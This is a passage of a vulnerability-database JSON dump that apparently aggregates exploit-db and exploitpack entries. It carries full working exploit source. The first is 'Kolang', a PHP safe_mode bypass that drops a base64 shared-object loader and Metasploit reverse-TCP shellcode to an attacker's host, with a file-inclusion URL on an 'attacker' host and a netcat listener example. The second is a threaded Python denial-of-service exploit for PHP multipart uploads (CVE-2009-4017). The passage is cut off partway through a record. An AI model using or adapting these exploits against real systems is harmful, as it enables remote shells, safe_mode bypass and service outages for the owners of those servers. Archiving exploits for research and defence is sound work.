AAAAYAAAADAAAAIB8AACAPAADIAAAABAAAAAAAAAAEAAAA\r\nCAAAAKMAAAABAAAAAwAAAOgfAADoDwAADAAAAAAAAAAAAAAABAAAAAQAAACoAAAAAQAAAAMAAAD0\r\nHwAA9A8AACQAAAAAAAAAAAAAAAQAAAAEAAAAsQAAAAEAAAADAAAAGCAAABgQAAAEAAAAAAAAAAAA\r\nAAAEAAAAAAAAALcAAAAIAAAAAwAAABwgAAAcEAAACAAAAAAAAAAAAAAABAAAAAAAAAC8AAAAAQAA\r\nAAAAAAAAAAAAHBAAAKYAAAAAAAAAAAAAAAEAAAAAAAAAEQAAAAMAAAAAAAAAAAAAAMIQAADFAAAA\r\nAAAAAAAAAAABAAAAAAAAAAEAAAACAAAAAAAAAAAAAADAFQAAsAIAABoAAAAeAAAABAAAABAAAAAJ\r\nAAAAAwAAAAAAAAAAAAAAcBgAAAsBAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAD0AAAAAAAAAAMAAQAAAAAAQAEAAAAAAAADAAIAAAAAAHwBAAAAAAAAAwADAAAAAABcAgAAAAAA\r\nAAMABAAAAAAA8gIAAAAAAAADAAUAAAAAABADAAAAAAAAAwAGAAAAAABAAwAAAAAAAAMABwAAAAAA\r\nYAMAAAAAAAADAAgAAAAAAJADAAAAAAAAAwAJAAAAAACoAwAAAAAAAAMACgAAAAAAIAQAAAAAAAAD\r\nAAsAAAAAAAgGAAAAAAAAAwAMAAAAAAAkBgAAAAAAAAMADQAAAAAARAYAAAAAAAADAA4AAAAAAAwf\r\nAAAAAAAAAwAPAAAAAAAUHwAAAAAAAAMAEAAAAAAAHB8AAAAAAAADABEAAAAAACAfAAAAAAAAAwAS\r\nAAAAAADoHwAAAAAAAAMAEwAAAAAA9B8AAAAAAAADABQAAAAAABggAAAAAAAAAwAVAAAAAAAcIAAA\r\nAAAAAAMAFgAAAAAAAAAAAAAAAAADABcAAQAAAAAAAAAAAAAABADx/w0AAAD0HwAAAAAAAAEC8f8j\r\nAAAAGCAAAAAAAAABAhUAMAAAABgfAAAAAAAAAQIQAD0AAAAHBQAAAAAAAAICCwBUAAAAIB8AAAAA\r\nAAABAvH/XQAAAAAAAAB6AAAAEgAAAG0AAAAAAAAAAAAAACAAAAB8AAAAAAAAAAAAAAAgAAAAkAAA\r\nAAAAAAD+AAAAEgAAAKQAAAAIBgAAAAAAABIADACqAAAAAAAAAHoAAAASAAAAugAAABwgAAAAAAAA\r\nEADx/8YAAAAMBQAAvQAAABIACwDNAAAAJCAAAAAAAAAQAPH/0gAAABwgAAAAAAAAEADx/9kAAAAA\r\nAAAACwEAACIAAAD1AAAAAAAAAP0AAAASAAAABQEAAJADAAAAAAAAEgAJAABzaGVsbGNvZGUuYwBf\r\nR0xPQkFMX09GRlNFVF9UQUJMRV8AX19kc29faGFuZGxlAF9fRFRPUl9FTkRfXwBfX2k2ODYuZ2V0\r\nX3BjX3RodW5rLmJ4AF9EWU5BTUlDAG9wZW5AQEdMSUJDXzIuMABfX2dtb25fc3RhcnRfXwBfSnZf\r\nUmVnaXN0ZXJDbGFzc2VzAHVuc2V0ZW52QEBHTElCQ18yLjAAX2ZpbmkAcmVhZEBAR0xJQkNfMi4w\r\nAF9fYnNzX3N0YXJ0AGdldHVpZABfZW5kAF9lZGF0YQBfX2N4YV9maW5hbGl6ZUBAR0xJQkNfMi4x\r\nLjMAZXhpdEBAR0xJQkNfMi4wAF9pbml0AA==\" ;\r\n}\r\n\r\nif (!function_exists('file_put_contents')){\r\n function file_put_contents($filename, $data){\r\n $f = @fopen($filename, 'w');\r\n if (!$f){\r\n return false;\r\n }\r\n else{\r\n $bytes = fwrite($f, $data);\r\n fclose($f);\r\n return $bytes;\r\n }\r\n }\r\n}\r\n\r\n// Note: change kolang.php and shellcode loader if sys_get_temp_dir()!='/tmp'\r\nfile_put_contents('/tmp/shellcode.so' , base64_decode($shellcode_loader));\r\n$ip = gethostbyname($host);\r\n\r\n$port1 = sprintf('%c', ($port>> 8)&255 );\r\n$port2 = sprintf('%c', ($port>> 0)&255 );\r\n\r\n$part = explode('.', $ip);\r\n//$HEXIP = sprintf('%02x%02x%02x%02x', $part[0], $part[1], $part[2], $part[3]);\r\n$STRINGIP = sprintf('%c%c%c%c', $part[0], $part[1], $part[2], $part[3]);\r\n\r\n/*\r\n * linux/x86/shell_reverse_tcp - 71 bytes\r\n * http://www.metasploit.com\r\n * Encoder: generic/none\r\n * LHOST=$STRINGIP, LPORT=$port1.$port2, ReverseConnectRetries=5,\r\n * PrependSetresuid=false, PrependSetreuid=false,\r\n * PrependSetuid=false, PrependChrootBreak=false,\r\n * AppendExit=false\r\n */\r\n\r\n\r\n$Xshellcode =\r\n\"\\x31\\xdb\\xf7\\xe3\\x53\\x43\\x53\\x6a\\x02\\x89\\xe1\\xb0\\x66\\xcd\\x80\".\r\n\"\\x5b\\x5e\\x68\".$STRINGIP.\"\\x66\\x68\".$port1.$port2.\"\\x66\\x53\\x6a\\x10\".\r\n\"\\x51\\x50\\x89\\xe1\\x43\\x6a\\x66\\x58\\xcd\\x80\\x59\\x87\\xd9\\xb0\\x3f\".\r\n\"\\xcd\\x80\\x49\\x79\\xf9\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\".\r\n\"\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\\x00\" ;\r\n\r\nif(isset($_REQUEST['shellcode'])){\r\n// just for fans of metasploit\r\n$Xshellcode=base64_decode($_REQUEST['shellcode']);\r\n}\r\n\r\nfile_put_contents(\"/tmp/.X11-IHSTEAM\", $Xshellcode);\r\n\r\n$cwd = '/tmp/';\r\n$env = array('LD_PRELOAD' => '/tmp/shellcode.so');\r\nunset($var);\r\n\r\n$descriptorspec = array(0 => array(\"pipe\", \"r\"), 1 => array(\"pipe\", \"w\"));\r\n\r\n// BOOM\r\nproc_open('IHSteam', $descriptorspec, $var, $cwd, $env);\r\nmail(\"IHSteam\",\"IHSteam\",\"IHSteam\",\"IHSteam\");\r\n?>\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/11636/"}, {"lastseen": "2016-02-01T12:06:31", "description": "PHP \"multipart/form-data\" Denial of Service Exploit (Python). CVE-2009-4017. Dos exploit for php platform", "published": "2009-11-27T00:00:00", "type": "exploitdb", "title": "PHP < 5.3.1 - \"multipart/form-data\" Denial of Service Exploit Python", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4017"], "modified": "2009-11-27T00:00:00", "id": "EDB-ID:10242", "href": "https://www.exploit-db.com/exploits/10242/", "sourceData": "#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n#\r\n# Author:\r\n# Eren Turkay <eren .-. pardus.org.tr>, 2009/11/20\r\n# http://www.pardus.org.tr/eng/\r\n#\r\n# Credits:\r\n# Bogdan Calin from Acunetix\r\n#\r\n# Description:\r\n# Exploit to cause denial of service on any host that runs PHP via temporary\r\n# file exhaustion. It doesn't matter whether the script handles uploads or not.\r\n# If host runs PHP, it is enough to cause DoS using any PHP script it serves.\r\n#\r\n# This is the implementation of disclosed vulnerability that was found\r\n# by Bogdan Calin. See: http://www.acunetix.com/blog/websecuritynews/php-multipartform-data-denial-of-service/\r\n#\r\n# Affected versions:\r\n# All PHP versions before PHP 5.3.1 and unpatched 5.2.11\r\n#\r\n# Platforms:\r\n# Windows, Linux, Mac\r\n#\r\n# Fix:\r\n# Update to 5.3.1. If you use 5.2.11 and can't update, apply the patch [0]:\r\n#\r\n# [0] http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/main/rfc1867.c?r1=272374&r2=289990&view=patch (introduce max_file_upload)\r\n# [0] http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/main/main.c?r1=289214&r2=289990&view=patch (NOTE: upstream changed 100 to 20, do it so)\r\n#\r\n# Usage:\r\n# python php-multipart-dos.py <site> <port> </index.php> <num of child: optional>\r\n#\r\n# After opening childs, you may wait long for threads to finish because sending such a huge data is painful.\r\n# However, it's not important to finish the request. Openining lots of connections and sending huge data fastly will enough to cause DoS.\r\n# So the more threads you spawn, the more impact you will make. In normal cases, spawning 150 childs would be enough. But the number depends on you.\r\n# Trial and error ;))\r\n#\r\n# Example:\r\n# python php-multipart-dos.py www.example.com 8080 /index.php\r\n#\r\n# By defalt, the program will create 100 threads, each thread will send 10 requests.\r\n# You can specify child number to create, you may want to increase or decrease for the impact, etc..\r\n#\r\n# python php-multipart-dos.py www.example.com 80 /~user/index.php 50\r\n#\r\n# Notes:\r\n# This script is for educational purposes only. Use it at your OWN risk!\r\n\r\nimport socket\r\nimport random\r\nimport time\r\nimport threading\r\nimport sys\r\n\r\nclass Connection:\r\n def __init__(self, host, port):\r\n self._host = host\r\n self._port = port\r\n self.sock = None\r\n\r\n def connect(self):\r\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n self.sock.connect((self._host, self._port))\r\n\r\n def send(self, msg):\r\n if not self.sock:\r\n raise \"NotConnected\"\r\n else:\r\n self.sock.send(msg)\r\n\r\n def close(self):\r\n self.sock.close()\r\n\r\nclass Exploit (threading.Thread):\r\n def __init__(self, host, port, target):\r\n self._host = host\r\n self._port = port\r\n self._target = target\r\n threading.Thread.__init__(self)\r\n\r\n def getBoundary(self):\r\n \"\"\" Return random boundary data \"\"\"\r\n random.seed()\r\n rnd = random.randrange(100000, 100000000)\r\n data = \"---------------------------%s\" % rnd\r\n return data\r\n\r\n def createPayload(self):\r\n data = \"\"\"POST %(target)s HTTP/1.1\\r\r\nHost: %(host)s\\r\r\nUset-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)\\r\r\nConnection: keep-alive\\r\r\nContent-Type: multipart/form-data; boundary=%(boundary)s\\r\r\nContent-Length: %(length)s\\r\\n\\r\\n\"\"\"\r\n\r\n boundary = self.getBoundary()\r\n\r\n # Create a number of upload data, 16.000, yeah! :)\r\n for i in range(16000):\r\n data += \"--%s\\r\\n\" % boundary\r\n data += \"\"\"Content-Disposition: form-data; name=\"file_%s\"; filename=\"file_%s.txt\"\\r\r\nContent-Type: text/plain\\r\\n\r\nLorem ipsum dolor sit amet, consectetur adipiscing elit. In non blandit augue.\\n\\r\\n\"\"\" % (i, i)\r\n\r\n data += \"--%s--\\r\\n\" % boundary\r\n\r\n return data % {\"host\": self._host, \"target\": self._target, \"boundary\": boundary, \"length\": str(len(data))}\r\n\r\n def run(self):\r\n payload = self.createPayload()\r\n for i in range(0, 10):\r\n c = Connection(self._host, self._port)\r\n c.connect()\r\n c.send(payload)\r\n c.close()\r\n sys.exit(0)\r\n del payload\r\n sys.exit(0)\r\n\r\ndef usage():\r\n usage_data = \"\"\"\r\n __^__ __^__\r\n( ___ )------------------------------------------------( ___ )\r\n | / | | \\ |\r\n | / | Eren Turkay <eren .-. pardus.org.tr>, 2009/11/20 | \\ |\r\n | / | http://www.pardus.org.tr/eng/ | \\ |\r\n |___| |___|\r\n(_____)------------------------------------------------(_____)\r\n\r\nPHP denial of service exploit via temporary file exhaustion\r\nUsage: python php-multipart-dos.py <host> <port> </adress/index.php> <child number: optional>\r\n\r\nSee source code for more information\r\n\"\"\"\r\n\r\n print usage_data\r\n\r\nif __name__ == '__main__':\r\n if not len(sys.argv) >= 4:\r\n usage()\r\n else:\r\n # is child number passed?\r\n if len(sys.argv) >= 5:\r\n child = int(sys.argv[4])\r\n else:\r\n child = 100\r\n print \"[+] Attack started...\"\r\n for i in range(0, child):\r\n try:\r\n exp = Exploit(str(sys.argv[1]), int(sys.argv[2]), str(sys.argv[3]))\r\n exp.start()\r\n print \"[+] Opening %s childs... [%s]\\r\" % (child, i+1),\r\n sys.stdout.flush()\r\n i += 1\r\n except KeyboardInterrupt:\r\n print \"\\n[-] Keyboard Interrupt. Exiting...\"\r\n sys.exit(1)\r\n\r\n # print it so that previous \"Opening childs...\" is still there\r\n print \"\"\r\n while True:\r\n try:\r\n activeChilds = threading.activeCount()\r\n print \"[+] Waiting for childs to finish. %d remaining...\\r\" % activeChilds,\r\n sys.stdout.flush()\r\n # we have one main process\r\n if activeChilds == 1:\r\n print \"\\nOK!\"\r\n sys.exit(0)\r\n except KeyboardInterrupt:\r\n print \"\\n[-] Exiting without waiting!\"\r\n sys.exit(1)", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/10242/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:24", "description": "\nKolang 4.3.10 5.3.0 - proc_open() PHP safe_mode Bypass", "edition": 1, "published": "2010-03-05T00:00:00", "title": "Kolang 4.3.10 5.3.0 - proc_open() PHP safe_mode Bypass", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4018"], "modified": "2010-03-05T00:00:00", "id": "EXPLOITPACK:85B6EA95447B86407811EF78E0844A44", "href": "", "sourceData": "<?php\n/*\nKolang (PHP Safe mode bypass)\n(IHSteam priv8 for lazy penetration testers)\n\n(php 4.3.10 - 5.3.0)\nhttp://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4018 (12/19/2009)\nhttp://www.milw0rm.com/exploits/7393 (12/09/2008)\n\n1- Kolang can be used directly in file inclusion RFI&LFI vulnerabilities (no upload required)\n2- Kolang can execute arbitrary shellcode (just for fans of metasploit )\n\n~~~~ How to use:)\n\nfor linux:\n\tkolang.php?os=linux&host=LHOST&port=LPORT\n\tor \n\tkolang.php?os=linux&shell=BASE64_ENCODED_SHELLCODE\n\nfor freebsd:\n\tkolang.php?os=freebsd&shell=BASE64_ENCODED_SHELLCODE\n\nfile inclusion :\n\thttp://host/vul.php?path=http://attacker/kolang.txt?&os=linux&host=LHOST&port=LPORT\n\n\nhttp://localhost/kolang.php?host=localhost&port=2121\nhamid@bugtraq ~ $ nc -vv -l -p 2121\nlistening on [any] 2121 ...\nconnect to [127.0.0.1] from bugtraq [127.0.0.1] 40526\nid\nuid=65534(nobody) gid=65533(nogroup) groups=65533(nogroup)\n\n\nHamid Ebadi\nhttp://www.bugtraq.ir\ncontact : ebadi~bugtraq~ir\n\nKolang means pickaxe (the idea came from amnafzar naming convention)\n(Separ, Sarand, Alak, Skort)\n*/\n\n\n$port= intval($_REQUEST['port']);\n$host= $_REQUEST['host'];\n$os= $_REQUEST['os'];\n\n/*\n\n\n//compile : cc -o shellcode.so -fPIC -shared shellcode.c\n//\n//<?php\n//$data=file_get_contents('shellcode.so');\n//file_put_contents('shellcode_base64.txt',$data);\n//?>\n\n\n\n\n// \"shellcode loader\" : load and execute arbitrary shellcode from a file\n// Hamid Ebadi\n#define O_RDONLY 00 ; fcntl.h\n#define SHELLCODE_MAX_SIZE 1024\n// change kolang.php and shellcode loader if sys_get_temp_dir()!='/tmp'\n#define SHELLCODE_FILENAME \"/tmp/.X11-IHSTEAM\"\n\nvoid getuid()\n{\n\tunsetenv(\"LD_PRELOAD\"); //not really necessary, we can remove it\n\tint fd;\n\tchar shellcode[SHELLCODE_MAX_SIZE];\n\tchar filename[]=SHELLCODE_FILENAME ;\n\t// we can also pass the shellcode in program's arguments\n\tif ((fd = open(SHELLCODE_FILENAME,O_RDONLY)) < 0) {\n\texit(1);\n\t}\n\tif (read(fd,shellcode,SHELLCODE_MAX_SIZE) < 0){\n\texit(1);\n\t}\n\t(*(void(*)()) shellcode)();\n}\n\n*/\n\nif ($_REQUEST['os']=='freebsd'){\n// freebsd shellcode loader (x86)\n$shellcode_loader=\n\"f0VMRgEBAQkAAAAAAAAAAAMAAwABAAAAeAUAADQAAADsCQAAAAAAADQAIAADACgAFwAUAAEAAAAA\nAAAAAAAAAAAAAADhBwAA4QcAAAUAAAAAEAAAAQAAAOQHAADkFwAA5BcAAPwAAAAYAQAABgAAAAAQ\nAAACAAAA8AcAAPAXAADwFwAAoAAAAKAAAAAGAAAABAAAABEAAAAkAAAAAAAAAB0AAAAeAAAAIgAA\nABUAAAAAAAAAAAAAABoAAAAcAAAAIwAAACEAAAAbAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXAAAAFAAAABYA\nAAAZAAAAAAAAAB8AAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJQAAAAAAAAAAwAB\nAAAAAABwAQAAAAAAAAMAAgAAAAAAsAMAAAAAAAADAAMAAAAAAGQEAAAAAAAAAwAEAAAAAACUBAAA\nAAAAAAMABQAAAAAA1AQAAAAAAAADAAYAAAAAAOgEAAAAAAAAAwAHAAAAAAB4BQAAAAAAAAMACAAA\nAAAAJAcAAAAAAAADAAkAAAAAADAHAAAAAAAAAwAKAAAAAADkFwAAAAAAAAMACwAAAAAA7BcAAAAA\nAAADAAwAAAAAAPAXAAAAAAAAAwANAAAAAACQGAAAAAAAAAMADgAAAAAAmBgAAAAAAAADAA8AAAAA\nAKAYAAAAAAAAAwAQAAAAAACkGAAAAAAAAAMAEQAAAAAA4BgAAAAAAAADABIAAAAAAAAAAAAAAAAA\nAwATAIQAAAAAAAAAAAAAABAAAAABAAAA8BcAAAAAAAARAPH/LAAAAAAAAAAAAAAAIAAAAH0AAABU\nBgAAnQAAABIACAAgAAAA1AQAAAAAAAASAAYAOwAAAAAAAAAAAAAAIAAAAJcAAAAAAAAAAAAAABAA\nAACjAAAA4BgAAAAAAAAQAPH/JgAAACQHAAAAAAAAEgAJAJwAAADgGAAAAAAAABAA8f8KAAAApBgA\nAAAAAAARAPH/rwAAAPwYAAAAAAAAEADx/5IAAAAAAAAAAAAAABAAAACNAAAAAAAAAAAAAAAQAAAA\naQAAAAAAAAAAAAAAIAAAAFMAAAAAAAAAAAAAACAAAAAAX0RZTkFNSUMAX0dMT0JBTF9PRkZTRVRf\nVEFCTEVfAF9pbml0AF9maW5pAF9fY3hhX2ZpbmFsaXplAF9fZGVyZWdpc3Rlcl9mcmFtZV9pbmZv\nAF9fcmVnaXN0ZXJfZnJhbWVfaW5mbwBfSnZfUmVnaXN0ZXJDbGFzc2VzAGdldHVpZAB1bnNldGVu\ndgBvcGVuAGV4aXQAcmVhZABfZWRhdGEAX19ic3Nfc3RhcnQAX2VuZADkFwAACAAAAOgXAAAIAAAA\n0BgAAAYWAADUGAAABhkAANgYAAAGIgAA3BgAAAYjAACwGAAABxQAALQYAAAHFgAAuBgAAAcZAAC8\nGAAABxoAAMAYAAAHIAAAxBgAAAchAADIGAAAByIAAMwYAAAHIwAAg+wM6BQBAADoEwIAAIPEDMMA\nAAD/swQAAAD/owgAAAAAAAAA/6MMAAAAaAAAAADp4P////+jEAAAAGgIAAAA6dD/////oxQAAABo\nEAAAAOnA/////6MYAAAAaBgAAADpsP////+jHAAAAGggAAAA6aD/////oyAAAABoKAAAAOmQ////\n/6MkAAAAaDAAAADpgP////+jKAAAAGg4AAAA6XD///9VieVT6AAAAABbgcMjEwAAUYC7PAAAAAB1\nWIuTLAAAAIXSdB+D7Az/s0D////oXv///4PEEOsMkIPABImDRP/////Si4NE////ixCF0nXpi4Mw\nAAAAhcB0EoPsDI2DSP///1DoOP///4PEEMaDPAAAAAGLXfzJw5BVieVT6AAAAABbgcOrEgAAUIuD\nOAAAAIXAdBmD7AiNg0AAAABQjYNI////UOhH////g8QQi4P8////hcB0HouDNAAAAIXAdBSD7AyN\ng/z///9Q6BH///+DxBCJ9otd/MnDkJCQVYnlV1ZTgew8BAAA6AAAAABbgcM/EgAAg+wMjYPW7v//\nUOh9/v//g8QQjb24+///jbPh7v///LkSAAAA86SD7AhqAI2D4e7//1Dopf7//4PEEIlF5IN95AB5\nCoPsDGoB6H/+//+D7ARoAAQAAI2F2Pv//1D/deToWP7//4PEEIXAeQqD7AxqAehX/v//jYXY+///\n/9CNZfRbXl/Jw5CQkFWJ5VZT6AAAAABbgcOmEQAAjYPw////jXD8i0D86wiQg+4E/9CLBoP4/3X0\nW17Jw4PsDOhM/v//g8QMwyRGcmVlQlNEOiBzcmMvbGliL2NzdS9pMzg2LWVsZi9jcnRpLlMsdiAx\nLjcgMjAwNS8wNS8xOSAwNzozMTowNiBkZnIgRXhwICQATERfUFJFTE9BRAAvdG1wLy5YMTEtSUhT\nVEVBTQAkRnJlZUJTRDogc3JjL2xpYi9jc3UvaTM4Ni1lbGYvY3J0bi5TLHYgMS42IDIwMDUvMDUv\nMTkgMDc6MzE6MDYgZGZyIEV4cCAkAAAAAOQXAACcGAAAAAAAAAwAAADUBAAADQAAACQHAAAEAAAA\nlAAAAAUAAACwAwAABgAAAHABAAAKAAAAtAAAAAsAAAAQAAAAAwAAAKQYAAACAAAAQAAAABQAAAAR\nAAAAFwAAAJQEAAARAAAAZAQAABIAAAAwAAAAEwAAAAgAAAD6//9vAgAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/////AAAAAP////8AAAAAAAAAAPAXAAAAAAAAAAAA\nAP4EAAAOBQAAHgUAAC4FAAA+BQAATgUAAF4FAABuBQAAAAAAAAAAAAAAAAAAAAAAAABHQ0M6IChH\nTlUpIDMuNC42IFtGcmVlQlNEXSAyMDA2MDMwNQAAR0NDOiAoR05VKSAzLjQuNiBbRnJlZUJTRF0g\nMjAwNjAzMDUAAEdDQzogKEdOVSkgMy40LjYgW0ZyZWVCU0RdIDIwMDYwMzA1AAAuc3ltdGFiAC5z\ndHJ0YWIALnNoc3RydGFiAC5oYXNoAC5keW5zeW0ALmR5bnN0cgAucmVsLmR5bgAucmVsLnBsdAAu\naW5pdAAudGV4dAAuZmluaQAucm9kYXRhAC5kYXRhAC5laF9mcmFtZQAuZHluYW1pYwAuY3RvcnMA\nLmR0b3JzAC5qY3IALmdvdAAuYnNzAC5jb21tZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAGwAAAAUAAAACAAAAlAAAAJQAAADcAAAAAgAAAAAAAAAEAAAABAAAACEA\nAAALAAAAAgAAAHABAABwAQAAQAIAAAMAAAAUAAAABAAAABAAAAApAAAAAwAAAAIAAACwAwAAsAMA\nALQAAAAAAAAAAAAAAAEAAAAAAAAAMQAAAAkAAAACAAAAZAQAAGQEAAAwAAAAAgAAAAAAAAAEAAAA\nCAAAADoAAAAJAAAAAgAAAJQEAACUBAAAQAAAAAIAAAAHAAAABAAAAAgAAABDAAAAAQAAAAYAAADU\nBAAA1AQAABEAAAAAAAAAAAAAAAQAAAAAAAAAPgAAAAEAAAAGAAAA6AQAAOgEAACQAAAAAAAAAAAA\nAAAEAAAABAAAAEkAAAABAAAABgAAAHgFAAB4BQAArAEAAAAAAAAAAAAABAAAAAAAAABPAAAAAQAA\nAAYAAAAkBwAAJAcAAAwAAAAAAAAAAAAAAAQAAAAAAAAAVQAAAAEAAAACAAAAMAcAADAHAACxAAAA\nAAAAAAAAAAABAAAAAAAAAF0AAAABAAAAAwAAAOQXAADkBwAACAAAAAAAAAAAAAAABAAAAAAAAABj\nAAAAAQAAAAIAAADsFwAA7AcAAAQAAAAAAAAAAAAAAAQAAAAAAAAAbQAAAAYAAAADAAAA8BcAAPAH\nAACgAAAAAwAAAAAAAAAEAAAACAAAAHYAAAABAAAAAwAAAJAYAACQCAAACAAAAAAAAAAAAAAABAAA\nAAAAAAB9AAAAAQAAAAMAAACYGAAAmAgAAAgAAAAAAAAAAAAAAAQAAAAAAAAAhAAAAAEAAAADAAAA\noBgAAKAIAAAEAAAAAAAAAAAAAAAEAAAAAAAAAIkAAAABAAAAAwAAAKQYAACkCAAAPAAAAAAAAAAA\nAAAABAAAAAQAAACOAAAACAAAAAMAAADgGAAA4AgAABwAAAAAAAAAAAAAAAQAAAAAAAAAkwAAAAEA\nAAAAAAAAAAAAAOAIAABvAAAAAAAAAAAAAAABAAAAAAAAABEAAAADAAAAAAAAAAAAAABPCQAAnAAA\nAAAAAAAAAAAAAQAAAAAAAAABAAAAAgAAAAAAAAAAAAAAhA0AABAEAAAWAAAAMQAAAAQAAAAQAAAA\nCQAAAAMAAAAAAAAAAAAAAJQRAAD1AQAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAlAAAAAAAAAADAAEAAAAAAHABAAAAAAAAAwACAAAAAACwAwAAAAAAAAMAAwAAAAAAZAQAAAAA\nAAADAAQAAAAAAJQEAAAAAAAAAwAFAAAAAADUBAAAAAAAAAMABgAAAAAA6AQAAAAAAAADAAcAAAAA\nAHgFAAAAAAAAAwAIAAAAAAAkBwAAAAAAAAMACQAAAAAAMAcAAAAAAAADAAoAAAAAAOQXAAAAAAAA\nAwALAAAAAADsFwAAAAAAAAMADAAAAAAA8BcAAAAAAAADAA0AAAAAAJAYAAAAAAAAAwAOAAAAAACY\nGAAAAAAAAAMADwAAAAAAoBgAAAAAAAADABAAAAAAAKQYAAAAAAAAAwARAAAAAADgGAAAAAAAAAMA\nEgAAAAAAAAAAAAAAAAADABMAAAAAAAAAAAAAAAAAAwAUAAAAAAAAAAAAAAAAAAMAFQAAAAAAAAAA\nAAAAAAADABYAAQAAAAAAAAAAAAAABADx/yIAAAAAAAAAAAAAAAQA8f8xAAAAAAAAAAAAAAAEAPH/\nAQAAAAAAAAAAAAAABADx/zwAAAAAAAAAAAAAAAQA8f9HAAAAkBgAAAAAAAABAA4AVQAAAJgYAAAA\nAAAAAQAPAGMAAADsFwAAAAAAAAEADAB2AAAAoBgAAAAAAAABABAAgwAAAOgXAAAAAAAAAQALAIcA\nAADgGAAAAQAAAAEAEgCTAAAAeAUAAAAAAAACAAgAqQAAAOQYAAAYAAAAAQASALIAAADwBQAAAAAA\nAAIACAA8AAAAAAAAAAAAAAAEAPH/vgAAAJQYAAAAAAAAAQAOAMsAAACcGAAAAAAAAAEADwDYAAAA\n7BcAAAAAAAABAAwA5gAAAKAYAAAAAAAAAQAQAPIAAAD0BgAAAAAAAAIACAAIAQAAAAAAAAAAAAAE\nAPH/IgAAAAAAAAAAAAAABADx/zEAAAAAAAAAAAAAAAQA8f8IAQAAAAAAAAAAAAAEAPH/KQEAAAAA\nAAAAAAAABADx/zUBAADkFwAAAAAAAAECCwBCAQAAAAAAAAAAAAAQAAAASwEAAPAXAAAAAAAAEQDx\n/1QBAAAAAAAAAAAAACAAAABjAQAAVAYAAJ0AAAASAAgAagEAANQEAAAAAAAAEgAGAHABAAAAAAAA\nAAAAACAAAACIAQAAAAAAAAAAAAAQAAAAjQEAAOAYAAAAAAAAEADx/5kBAAAkBwAAAAAAABIACQCf\nAQAA4BgAAAAAAAAQAPH/pgEAAKQYAAAAAAAAEQDx/7wBAAD8GAAAAAAAABAA8f/BAQAAAAAAAAAA\nAAAQAAAAxgEAAAAAAAAAAAAAEAAAAMsBAAAAAAAAAAAAACAAAADfAQAAAAAAAAAAAAAgAAAAAC91\nc3Ivc3JjL2xpYi9jc3UvaTM4Ni1lbGYvY3J0aS5TADxjb21tYW5kIGxpbmU+ADxidWlsdC1pbj4A\nY3J0c3R1ZmYuYwBfX0NUT1JfTElTVF9fAF9fRFRPUl9MSVNUX18AX19FSF9GUkFNRV9CRUdJTl9f\nAF9fSkNSX0xJU1RfXwBwLjAAY29tcGxldGVkLjEAX19kb19nbG9iYWxfZHRvcnNfYXV4AG9iamVj\ndC4yAGZyYW1lX2R1bW15AF9fQ1RPUl9FTkRfXwBfX0RUT1JfRU5EX18AX19GUkFNRV9FTkRfXwBf\nX0pDUl9FTkRfXwBfX2RvX2dsb2JhbF9jdG9yc19hdXgAL3Vzci9zcmMvbGliL2NzdS9pMzg2LWVs\nZi9jcnRuLlMAc2hlbGxjb2RlLmMAX19kc29faGFuZGxlAHVuc2V0ZW52AF9EWU5BTUlDAF9fY3hh\nX2ZpbmFsaXplAGdldHVpZABfaW5pdABfX2RlcmVnaXN0ZXJfZnJhbWVfaW5mbwByZWFkAF9fYnNz\nX3N0YXJ0AF9maW5pAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9UQUJMRV8AX2VuZABleGl0AG9wZW4A\nX0p2X1JlZ2lzdGVyQ2xhc3NlcwBfX3JlZ2lzdGVyX2ZyYW1lX2luZm8A\";\n}else{\n// default: linux\n// linux shellcode loader 